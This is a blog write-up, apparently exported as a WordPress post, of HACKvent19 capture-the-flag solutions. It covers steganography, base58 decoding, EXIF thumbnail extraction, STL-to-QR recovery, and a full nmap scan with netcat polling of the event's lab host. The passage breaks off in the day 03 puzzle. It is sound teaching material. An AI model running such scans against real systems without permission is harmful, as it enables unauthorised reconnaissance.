{"id":1663,"date":"2020-01-01T10:09:53","date_gmt":"2020-01-01T10:09:53","guid":{"rendered":"https:\/\/devel0pment.de\/?p=1663"},"modified":"2020-01-01T10:09:55","modified_gmt":"2020-01-01T10:09:55","slug":"hackvent19-writeup","status":"publish","type":"post","link":"https:\/\/devel0pment.de\/?p=1663","title":{"rendered":"HACKvent19 writeup"},"content":{"rendered":"<p><style>.spanFlag {color:#0000ff;font-weight:bold;}<br \/>\n.chlgTable {border:2px dotted #000000;font-style:italic;margin-top:-10px;}<br \/>\n.chlgTable tr td {padding:10px;}<\/style>\n<\/p>\n<table>\n<tbody>\n<tr>\n<td width=\"75\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-1672\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/hv19_logo.png\" alt=\"\" width=\"123\" height=\"132\"><\/td>\n<td>This year&#8217;s <b>HACKvent<\/b> was hosted on the brand new <a href=\"https:\/\/academy.hacking-lab.com\/\" target=\"_blank\" rel=\"noopener noreferrer\">Hacking-Lab 2.0<\/a> plattform. Each day from the 1st of december until the 24th a new challenge is published raising in difficulty. The flag format changed from <code>HV18-xxxx-xxxx-xxxx-xxxx-xxxx<\/code> to <code>HV19{...}<\/code>. After all I managed to solve all 28 challenges \ud83d\ude42<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<table style=\"display: table-cell; vertical-align: top;\">\n<tbody>\n<tr>\n<td width=\"75\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-1749 size-full\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/hidden_64.png\" alt=\"\" width=\"120\" height=\"120\" srcset=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/hidden_64.png 120w, https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/hidden_64-100x100.png 100w\" sizes=\"(max-width: 120px) 100vw, 120px\" \/><\/td>\n<td><span style=\"font-size: larger; font-weight: bold; color: #444444; text-shadow: 1px 1px #000000;\">Hidden<\/span><\/td>\n<\/tr>\n<tr>\n<td colspan=\"2\"><a href=\"https:\/\/devel0pment.de\/?p=1663#chlgHV19.H1\"><b>HV19.H1<\/b> Hidden One<\/a><br><a href=\"https:\/\/devel0pment.de\/?p=1663#chlgHV19.H2\"><b>HV19.H2<\/b> Hidden Two<\/a><br><a href=\"https:\/\/devel0pment.de\/?p=1663#chlgHV19.H3\"><b>HV19.H3<\/b> Hidden Three<\/a><br><a href=\"https:\/\/devel0pment.de\/?p=1663#chlgHV19.H4\"><b>HV19.H4<\/b> Hidden Four<\/a><\/td>\n<\/tr>\n<tr>\n<td width=\"75\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-1750 size-full\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/easy_64-1.png\" alt=\"\" width=\"120\" height=\"120\" srcset=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/easy_64-1.png 120w, https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/easy_64-1-100x100.png 100w\" sizes=\"(max-width: 120px) 100vw, 120px\" \/><\/td>\n<td><span style=\"font-size: larger; font-weight: bold; color: #54af79; text-shadow: 1px 1px #000000;\">Easy<\/span><\/td>\n<\/tr>\n<tr>\n<td colspan=\"2\"><a href=\"https:\/\/devel0pment.de\/?p=1663#chlgHV19.01\"><b>HV19.01<\/b> censored<\/a><br><a href=\"https:\/\/devel0pment.de\/?p=1663#chlgHV19.02\"><b>HV19.02<\/b> Triangulation<\/a><br><a href=\"https:\/\/devel0pment.de\/?p=1663#chlgHV19.03\"><b>HV19.03<\/b> Hodor, Hodor, Hodor<\/a><br><a href=\"https:\/\/devel0pment.de\/?p=1663#chlgHV19.04\"><b>HV19.04<\/b> password policy circumvention<\/a><br><a href=\"https:\/\/devel0pment.de\/?p=1663#chlgHV19.05\"><b>HV19.05<\/b> Santa Parcel Tracking<\/a><br><a href=\"https:\/\/devel0pment.de\/?p=1663#chlgHV19.06\"><b>HV19.06<\/b> bacon and eggs<\/a><br><a href=\"https:\/\/devel0pment.de\/?p=1663#chlgHV19.07\"><b>HV19.07<\/b> Santa Rider<\/a><\/td>\n<\/tr>\n<tr>\n<td width=\"75\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-1751 size-full\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/medium_64-1.png\" alt=\"\" width=\"120\" height=\"120\" srcset=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/medium_64-1.png 120w, https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/medium_64-1-100x100.png 100w\" sizes=\"(max-width: 120px) 100vw, 120px\" \/><\/td>\n<td><span style=\"font-size: larger; font-weight: bold; color: #9caf54; text-shadow: 1px 1px #000000;\">Medium<\/span><\/td>\n<\/tr>\n<tr>\n<td colspan=\"2\"><a href=\"https:\/\/devel0pment.de\/?p=1663#chlgHV19.08\"><b>HV19.08<\/b> SmileNcryptor 4.0<\/a><br><a href=\"https:\/\/devel0pment.de\/?p=1663#chlgHV19.09\"><b>HV19.09<\/b> Santas Quick Response 3.0<\/a><br><a href=\"https:\/\/devel0pment.de\/?p=1663#chlgHV19.10\"><b>HV19.10<\/b> Guess what<\/a><br><a href=\"https:\/\/devel0pment.de\/?p=1663#chlgHV19.11\"><b>HV19.11<\/b> Frolicsome Santa Jokes API<\/a><br><a href=\"https:\/\/devel0pment.de\/?p=1663#chlgHV19.12\"><b>HV19.12<\/b> back to basic<\/a><br><a href=\"https:\/\/devel0pment.de\/?p=1663#chlgHV19.13\"><b>HV19.13<\/b> TrieMe<\/a><br><a href=\"https:\/\/devel0pment.de\/?p=1663#chlgHV19.14\"><b>HV19.14<\/b> Achtung das Flag<\/a><\/td>\n<\/tr>\n<tr>\n<td width=\"75\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-1752 size-full\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/hard_64-1.png\" alt=\"\" width=\"120\" height=\"120\" srcset=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/hard_64-1.png 120w, https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/hard_64-1-100x100.png 100w\" sizes=\"(max-width: 120px) 100vw, 120px\" \/><\/td>\n<td><span style=\"font-size: larger; font-weight: bold; color: #af5458; text-shadow: 1px 1px #000000;\">Hard<\/span><\/td>\n<\/tr>\n<tr>\n<td colspan=\"2\"><a href=\"https:\/\/devel0pment.de\/?p=1663#chlgHV19.15\"><b>HV19.15<\/b> Santa&#8217;s Workshop<\/a><br><a href=\"https:\/\/devel0pment.de\/?p=1663#chlgHV19.16\"><b>HV19.16<\/b> B0rked Calculator<\/a><br><a href=\"https:\/\/devel0pment.de\/?p=1663#chlgHV19.17\"><b>HV19.17<\/b> Unicode Portal<\/a><br><a href=\"https:\/\/devel0pment.de\/?p=1663#chlgHV19.18\"><b>HV19.18<\/b> Dance with me<\/a><br><a href=\"https:\/\/devel0pment.de\/?p=1663#chlgHV19.19\"><b>HV19.19<\/b> U+1F385<\/a><br><a href=\"https:\/\/devel0pment.de\/?p=1663#chlgHV19.20\"><b>HV19.20<\/b> i want to play a game<\/a><br><a href=\"https:\/\/devel0pment.de\/?p=1663#chlgHV19.21\"><b>HV19.21<\/b> Happy Christmas 256<\/a><\/td>\n<\/tr>\n<tr>\n<td width=\"75\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-1753 size-full\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/final_64-1.png\" alt=\"\" width=\"120\" height=\"120\" srcset=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/final_64-1.png 120w, https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/final_64-1-100x100.png 100w\" sizes=\"(max-width: 120px) 100vw, 120px\" \/><\/td>\n<td><span style=\"font-size: larger; font-weight: bold; color: #ff0000; text-shadow: 1px 1px #000000;\">Leet<\/span><\/td>\n<\/tr>\n<tr>\n<td colspan=\"2\"><a href=\"https:\/\/devel0pment.de\/?p=1663#chlgHV19.22\"><b>HV19.22<\/b> The command &#8230; is lost<\/a><br><a href=\"https:\/\/devel0pment.de\/?p=1663#chlgHV19.23\"><b>HV19.23<\/b> Internet Data Archive<\/a><br><a href=\"https:\/\/devel0pment.de\/?p=1663#chlgHV19.24\"><b>HV19.24<\/b> ham radio<\/a><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p><!--more--><\/p>\n\n\n<style>\ncode {\n  font-size:14px;\n  font-weight:bold;\n}\n\n.spanFlag {\n  color:#0000ff;\n  font-weight:bold;\n }\n\n.link {\n  color:#0000ff;\n  text-decoration:underline;\n}\n\n.chlgTable {\n  border:1px solid #000000;\n  font-style:italic;\n  margin-top:-15px;\n  width:100%;\n}\n\n.chlgTable tr td {\n  padding:10px;\n}\n<\/style>\n\n\n\n<hr id=\"chlgHV19.H1\"\/><span style=\"float:right;\"><a href=\"\">return to overview &#x21E7;<\/a><\/span><h1>HV19.H1 &#8211; Hidden&nbsp;One<\/h1>\n<table class=\"chlgTable\"><tbody><tr><td width=\"130\"><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/ball_h1.png\" \/><\/td><td style=\"color:#333333\">Author: hidden<\/td><\/tr><tr><td colspan=\"2\">Sometimes, there are hidden flags. Got your first?<\/td><\/tr><\/tbody><\/table>\n<br\/>The challenge is hidden in the challenge of <a href=\"#chlgHV19.06\">day06<\/a>:\n<br\/><pre>\n<br\/>Born: January 22\t     \t \t   \t   \t \t       \t     \t  \t  \n<br\/>Died: April 9   \t  \t \t    \t  \t      \t   \t\t  \t  \n<br\/>Mother: Lady Anne   \t\t \t   \t   \t      \t  \t      \t  \n<br\/>Father: Sir Nicholas\t \t      \t\t    \t    \t  \t  \t      \t      \n<br\/>Secrets: unknown      \t \t  \t \t    \t    \t   \t       \t  \n<br\/><\/pre>If we inspect the data carefully, we can notice that after each entry there are additional tabs and spaces:\n<br\/><pre>\n<br\/>Born:\\x20January\\x2022\\x09\\x20\\x20\\x20\\x20\\x20\\x09\\x20\\x09\\x20\\x20\\x20\\x09\\x20\\x20\\x20\\x09\\x20\\x09\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x09\\x20\\x20\\x20\\x20\\x20\\x09\\x20\\x20\\x09\\x20\\x20\n<br\/>Died:\\x20April\\x209\\x20\\x20\\x20\\x09\\x20\\x20\\x09\\x20\\x09\\x20\\x20\\x20\\x20\\x09\\x20\\x20\\x09\\x20\\x20\\x20\\x20\\x20\\x20\\x09\\x20\\x20\\x20\\x09\\x09\\x20\\x20\\x09\\x20\\x20\n<br\/>Mother:\\x20Lady\\x20Anne\\x20\\x20\\x20\\x09\\x09\\x20\\x09\\x20\\x20\\x20\\x09\\x20\\x20\\x20\\x09\\x20\\x20\\x20\\x20\\x20\\x20\\x09\\x20\\x20\\x09\\x20\\x20\\x20\\x20\\x20\\x20\\x09\\x20\\x20\n<br\/>Father:\\x20Sir\\x20Nicholas\\x09\\x20\\x09\\x20\\x20\\x20\\x20\\x20\\x20\\x09\\x09\\x20\\x20\\x20\\x20\\x09\\x20\\x20\\x20\\x20\\x09\\x20\\x20\\x09\\x20\\x20\\x09\\x20\\x20\\x20\\x20\\x20\\x20\\x09\\x20\\x20\\x20\\x20\\x20\\x20\n<br\/>Secrets:\\x20unknown\\x20\\x20\\x20\\x20\\x20\\x20\\x09\\x20\\x09\\x20\\x20\\x09\\x20\\x09\\x20\\x20\\x20\\x20\\x09\\x20\\x20\\x20\\x20\\x09\\x20\\x20\\x20\\x09\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x09\\x20\\x20\n<br\/><\/pre>After a little bit of googling I stumbled upon <a href=\"http:\/\/manpages.ubuntu.com\/manpages\/bionic\/man1\/stegsnow.1.html\" rel=\"noopener noreferrer\" target=\"_blank\">stegsnow<\/a>:\n<br\/>\n<br\/><i>stegsnow is a program for concealing messages in text files by appending tabs  and  spaces\n<br\/>on  the  end  of lines, and for extracting messages from files containing hidden messages.\n<br\/>Tabs and spaces are invisible to most text viewers, hence  the  steganographic  nature  of\n<br\/>this encoding scheme.<\/i>\n<br\/>\n<br\/>By copy&#038;pasting the contents of the box (click on the icon in the upper right corner) to a file, we can easily extract the hidden flag:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/hidden01# stegsnow -C hidden.txt \nHV19{1stHiddenFound}<\/pre>\n<br\/>The flag is <span class=\"spanFlag\">HV19{1stHiddenFound}<\/span>.\n<br\/><br\/>\n<hr id=\"chlgHV19.H2\"\/><span style=\"float:right;\"><a href=\"\">return to overview &#x21E7;<\/a><\/span><h1>HV19.H2 &#8211; Hidden&nbsp;Two<\/h1>\n<table class=\"chlgTable\"><tbody><tr><td width=\"130\"><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/ball_h2.png\" \/><\/td><td style=\"color:#333333\">Author: inik<\/td><\/tr><tr><td colspan=\"2\">Again a hidden flag.<\/td><\/tr><\/tbody><\/table>\n<br\/>The flag is hidden in the name of the <code>.mp4<\/code> file from the challenge of <a href=\"#chlgHV19.07\">day07<\/a>:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/07# unzip 3dbe0c12-d794-4f79-ae67-09ac27bd099d.zip\nArchive:  3dbe0c12-d794-4f79-ae67-09ac27bd099d.zip\n  inflating: 3DULK2N7DcpXFg8qGo9Z9qEQqvaEDpUCBB1v.mp4<\/pre>  \n<br\/>The <code>Magic<\/code> tool of <a href=\"https:\/\/gchq.github.io\/CyberChef\/\" rel=\"noopener noreferrer\" target=\"_blank\">CyberChef<\/a> quickly reveals that the filename contains the base58-encoded flag:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/h1_01_cyberchef.png\" width=\"800px\"\/>\n<br\/>\n<br\/>Of course this can also be done using python:<pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/07# pip install base58\n...\nroot@kali:~\/hv19\/07# python\nPython 2.7.16 (default, Apr  6 2019, 01:42:57)\n[GCC 8.3.0] on linux2\nType \"help\", \"copyright\", \"credits\" or \"license\" for more information.\n&gt;&gt;&gt; import base58\n&gt;&gt;&gt; base58.b58decode('3DULK2N7DcpXFg8qGo9Z9qEQqvaEDpUCBB1v')\n'HV19{Dont_confuse_0_and_O}'<\/pre>\n<br\/>The flag is <span class=\"spanFlag\">HV19{Dont_confuse_0_and_O}<\/span>.\n<br\/><br\/>\n<hr id=\"chlgHV19.H3\"\/><span style=\"float:right;\"><a href=\"\">return to overview &#x21E7;<\/a><\/span><h1>HV19.H3 &#8211; Hidden&nbsp;Three<\/h1>\n<table class=\"chlgTable\"><tbody><tr><td width=\"130\"><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/ball_h3.png\" \/><\/td><td style=\"color:#333333\">Author: M. \/ inik<\/td><\/tr><tr><td colspan=\"2\">Not each quote is compl<\/td><\/tr><\/tbody><\/table>\n<br\/>Since the challenge is in the category <code>Penetration Testing<\/code>, let&#8217;s run a full nmap scan on the <code>whale.hacking-lab.com<\/code> host:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/hidden03# nmap whale.hacking-lab.com -p-\nNmap scan report for urb80-74-140-188.ch-meta.net (80.74.140.188)\nHost is up (2.2s latency).\nNot shown: 65527 filtered ports\nPORT      STATE  SERVICE\n17\/tcp    open   qotd\n22\/tcp    open   ssh\n80\/tcp    closed http\n443\/tcp   closed https\n2222\/tcp  closed EtherNetIP-1\n4444\/tcp  closed krb524\n5555\/tcp  closed freeciv\n10101\/tcp open   ezmeeting-2\n\nNmap done: 1 IP address (1 host up) scanned in 3504.09 seconds\n<\/pre>\n<br\/>Very suspicious is the open <code>tcp port 17<\/code>. The service behind this is called <a href=\"https:\/\/en.wikipedia.org\/wiki\/QOTD\" rel=\"noopener noreferrer\" target=\"_blank\">Quote of the Day (QOTD)<\/a>, which perfectly fits the challenge&#8217;s description. The service is quite simple: accept a tcp connection, send a random quote, close connection. So let&#8217;s have a look using <code>netcat<\/code>:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/hidden03# nc -v whale.hacking-lab.com 17\nConnection to whale.hacking-lab.com 17 port [tcp\/qotd] succeeded!\nr<\/pre>\n<br\/>The server only echoed the letter <code>r<\/code>. After trying out different approaches I recognized (approximately one hour later), that the server now returns the letter <code>_<\/code>:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/hidden03# nc -v whale.hacking-lab.com 17\nConnection to whale.hacking-lab.com 17 port [tcp\/qotd] succeeded!\n_<\/pre>\n<br\/>Actually this seems to be the flag, which is echoed back from the server very slow (a letter an hour). So we just have to create a little bash script, which retrieves the letter from the server each hour (I set it to 10 minutes just in case) and wait &#8230; :\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/hidden03# cat quote.sh \n#!\/bin\/bash\n\nwhile true; do\n  (date;echo|nc 80.74.140.188 17) | tee -a flag.txt\n  sleep 600\ndone;<\/pre>\n<br\/>After one day we finally get the full flag.\n<br\/>\n<br\/>The flag is <span class=\"spanFlag\">HV19{an0ther_DAILY_fl4g}<\/span>.\n<br\/><br\/>\n<hr id=\"chlgHV19.H4\"\/><span style=\"float:right;\"><a href=\"\">return to overview &#x21E7;<\/a><\/span><h1>HV19.H4 &#8211; Hidden&nbsp;Four<\/h1>\n<table class=\"chlgTable\"><tbody><tr><td width=\"130\"><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/ball_h4.png\" \/><\/td><td style=\"color:#333333\">Author: M.<\/td><\/tr><tr><td colspan=\"2\">No description.<\/td><\/tr><\/tbody><\/table>\n<br\/>The flag is hidden in the flag of <a href=\"#chlgHV19.14\">day14<\/a>. It must be simply run with perl:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/hidden04# cat flag_14.pl\ns@@jSfx4gPcvtiwxPCagrtQ@,y^p-za-oPQ^a-z\\x20\\n^&&s[(.)(..)][\\2\\1]g;s%4(...)%\"p$1t\"%ee\nroot@kali:~\/hv19\/hidden04# perl flag_14.pl\nSqu4ring the Circle<\/pre>\n<br\/>The flag is <span class=\"spanFlag\">HV19{Squ4ring the Circle}<\/span>.\n<br\/><br\/>\n<hr id=\"chlgHV19.01\"\/><span style=\"float:right;\"><a href=\"\">return to overview &#x21E7;<\/a><\/span><h1>HV19.01 &#8211; censored<\/h1>\n<table class=\"chlgTable\"><tbody><tr><td width=\"130\"><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/ball_01.png\" \/><\/td><td style=\"color:#333333\">Author: M<\/td><\/tr><tr><td colspan=\"2\">I got this little image, but it looks like the best part got censored on the way. Even the tiny preview icon looks clearer than this! Maybe they missed something that would let you restore the original content?<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/01_01_ball.jpg\" \/><\/td><\/tr><\/tbody><\/table>\n<br\/>The first challenge of this year provides an image of a blurry QR code as well as a hint that <i>the tiny preview icon looks clearer than this<\/i>.\n<br\/>\n<br\/>Running <code>exiftool<\/code> on the image reveals that there is actually a thumbnail image included in the file:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/01# exiftool f182d5f0-1d10-4f0f-a0c1-7cba0981b6da.jpg\nExifTool Version Number         : 11.16\nFile Name                       : f182d5f0-1d10-4f0f-a0c1-7cba0981b6da.jpg\n...\nThumbnail Image                 : (Binary data 5336 bytes, use -b option to extract)<\/pre>\n<br\/>The thumbnail image can be extracted using the <code>-b<\/code> option of <code>exiftool<\/code> and additionally providing <code>-ThumbnailImage<\/code>:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/01# exiftool -b -ThumbnailImage f182d5f0-1d10-4f0f-a0c1-7cba0981b6da.jpg &gt; thumbnail.jpg<\/pre>\n<br\/>The extracted thumbnail looks like this:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/01_02_thumbnail.jpg\" \/>\n<br\/>\n<br\/>In order to be able to scan the QR code, we should delete the christmas tree ball around the QR code:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/01_03_thumbnail_edited.jpg\" \/>\n<br\/>\n<br\/>Now the QR code can be scanned eg. using <code>zbarimg<\/code>:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/01# zbarimg thumbnail_edited.jpg\nQR-Code:HV19{just-4-PREview!}\nscanned 1 barcode symbols from 1 images in 0.03 seconds<\/pre>\n<br\/>The flag is <span class=\"spanFlag\">HV19{just-4-PREview!}<\/span>.\n<br\/><br\/>\n<hr id=\"chlgHV19.02\"\/><span style=\"float:right;\"><a href=\"\">return to overview &#x21E7;<\/a><\/span><h1>HV19.02 &#8211; Triangulation<\/h1>\n<table class=\"chlgTable\"><tbody><tr><td width=\"130\"><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/ball_02.png\" \/><\/td><td style=\"color:#333333\">Author: drschottky<\/td><\/tr><tr><td colspan=\"2\">Today we give away decorations for your Christmas tree. But be careful and do not break it.\n<br\/>\n<br\/><span class=\"link\">HV19.02-Triangulation.zip<\/span><\/td><\/tr><\/tbody><\/table>\n<br\/>The challenge provides a zip file, which contains an <code>stl<\/code> file:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/02# unzip a5f47ab8-f151-4741-b061-d2ab331bf641.zip \nArchive:  a5f47ab8-f151-4741-b061-d2ab331bf641.zip\n  inflating: Triangulation.stl<\/pre>\n<br\/><code>stl<\/code> files can be represented in both ASCII and binary. In this case we are dealing with a binary file:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/02# file Triangulation.stl\nTriangulation.stl: data\nroot@kali:~\/hv19\/02# hexdump -C Triangulation.stl | head\n00000000  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|\n*\n00000050  58 20 00 00 61 d9 9b 3e  81 9b 65 bf f7 3e a4 be  |X ..a..&gt;..e..&gt;..|\n00000060  c5 20 38 41 74 dc 15 40  81 95 13 42 3d 0a 37 41  |. 8At..@...B=.7A|\n00000070  57 3d 13 40 b4 c8 13 42  06 81 13 41 cb a1 e5 3f  |W=.@...B...A...?|\n00000080  1f 05 11 42 00 00 fe eb  71 3f c0 33 7e 3d 27 68  |...B....q?.3~='h|\n00000090  a4 3e a8 c6 d0 41 00 00  d0 41 8d 17 5b 42 27 31  |.&gt;...A...A..[B'1|\n000000a0  d9 41 00 00 d0 41 3f b5  4e 42 37 89 d7 41 4c 37  |.A...A?.NB7..AL7|\n000000b0  e9 41 3f b5 4e 42 00 00  31 a6 f8 3e 00 00 00 00  |.A?.NB..1..&gt;....|\n000000c0  c5 c8 5f 3f 66 66 3a 41  a6 af 85 40 77 3e 13 42  |.._?ff:A...@w&gt;.B|<\/pre>\n<br\/>In order to process the file more easily, let&#8217;s convert it to ASCII using <a href=\"https:\/\/github.com\/cmpolis\/convertSTL\" rel=\"noopener noreferrer\" target=\"_blank\">convertSTL<\/a>:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/02# git clone https:\/\/github.com\/cmpolis\/convertSTL\nCloning into 'convertSTL'...\nremote: Enumerating objects: 10, done.\nremote: Total 10 (delta 0), reused 0 (delta 0), pack-reused 10\nUnpacking objects: 100% (10\/10), done.\nroot@kali:~\/hv19\/02# .\/convertSTL\/convertSTL.rb Triangulation.stl\nTriangulation.stl is in BINARY format, converting to ASCII: Triangulation-ascii.stl<\/pre>\n<br\/>Now the content can be read a little bit more easily:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/02# head -n 20 Triangulation-ascii.stl \nsolid \n  facet normal 3.043928E-01 -8.969041E-01 -3.207929E-01\n    outer loop\n      vertex 1.150800E+01 2.341580E+00 3.689600E+01\n      vertex 1.144000E+01 2.300619E+00 3.694600E+01\n      vertex 9.219000E+00 1.794000E+00 3.625500E+01\n    endloop\n  endfacet\n  facet normal 9.450072E-01 6.206107E-02 3.211071E-01\n    outer loop\n      vertex 2.609700E+01 2.600000E+01 5.477300E+01\n      vertex 2.714900E+01 2.600000E+01 5.167700E+01\n      vertex 2.694200E+01 2.915200E+01 5.167700E+01\n    endloop\n  endfacet\n  facet normal 4.856429E-01 0.000000E+00 8.741572E-01\n    outer loop\n      vertex 1.165000E+01 4.177691E+00 3.681100E+01\n      vertex 1.157800E+01 4.138959E+00 3.685100E+01\n      vertex 1.165000E+01 2.420174E+00 3.681100E+01<\/pre>\n<br\/>The file defines triangles (polygons), which consist of three vertices and a facet normal. The resulting 3D-model can for example be viewed using an online viewer like <a href=\"https:\/\/www.viewstl.com\/\" rel=\"noopener noreferrer\" target=\"_blank\">www.viewstl.com<\/a>:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/02_01_ball.png\" \/>\n<br\/>\n<br\/>When changing the display option to <code>Wireframe<\/code>, we can see that within the christmas tree ball, there seems to be the QR code we are looking for:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/02_02_ball_wireframe.png\" \/>\n<br\/>\n<br\/>After filtering out different triangles and having a look at the resulting model, it turned out, that the QR code can be viewed quite good if we extract all triangles with a facet normal of <code>0.0 0.0 -1.0<\/code>:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">#!\/usr\/bin\/env python\n\nlines = open('Triangulation-ascii.stl').read().split('\\n')\n\nprint('solid')\nfor i in range(len(lines)):\n  line = lines[i]\n  if ('facet normal 0.000000E+00 0.000000E+00 -1.000000E+00' in line):\n      print('\\n'.join(lines[i:i+7]))\nprint('endsolid')<\/pre><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/02# .\/extractQR.py &gt; qrcode.stl<\/pre>\n<br\/>The resulting model looks like this (QR code moved to the center and color turned to black):\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/02_03_qrcode.png\" \/>\n<br\/>\n<br\/>The QR code can for example be scanned using <a href=\"https:\/\/zxing.org\/w\/decode.jspx\" rel=\"noopener noreferrer\" target=\"_blank\">zxing.org<\/a>:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/02_04_scanned_qrcode.png\" \/>\n<br\/>\n<br\/>The flag is <span class=\"spanFlag\">HV19{Cr4ck_Th3_B411!}<\/span>.\n<br\/><br\/>\n<hr id=\"chlgHV19.03\"\/><span style=\"float:right;\"><a href=\"\">return to overview &#x21E7;<\/a><\/span><h1>HV19.03 &#8211; Hodor,&nbsp;Hodor,&nbsp;Hodor<\/h1>\n<table class=\"chlgTable\"><tbody><tr><td width=\"130\"><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/ball_03.png\" \/><\/td><td style=\"color:#333333\">Author: otaku feat. trolli101<\/td><\/tr><tr><td colspan=\"2\"><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/03_01_hodor.jpg\" \/>\n<br\/><pre style=\"white-space:pre-wrap;\">$HODOR: hhodor. Hodor. Hodor!?  = `hodor?!? HODOR!? hodor? Hodor oHodor. hodor? , HODOR!?! ohodor!?  dhodor? hodor odhodor? d HodorHodor  Hodor!? HODOR HODOR? hodor! hodor!? HODOR hodor! hodor? ! \n<br\/>hodor?!? Hodor  Hodor Hodor? Hodor  HODOR  rhodor? HODOR Hodor!?  h4Hodor?!? Hodor?!? 0r hhodor?  Hodor!? oHodor?! hodor? Hodor  Hodor! HODOR Hodor hodor? 64 HODOR Hodor  HODOR!? hodor? Hodor!? Hodor!? .\n<br\/>HODOR?!? hodor- hodorHoOodoOor Hodor?!? OHoOodoOorHooodorrHODOR hodor. oHODOR... Dhodor- hodor?! HooodorrHODOR HoOodoOorHooodorrHODOR RoHODOR... HODOR!?! 1hodor?! HODOR... DHODOR- HODOR!?! 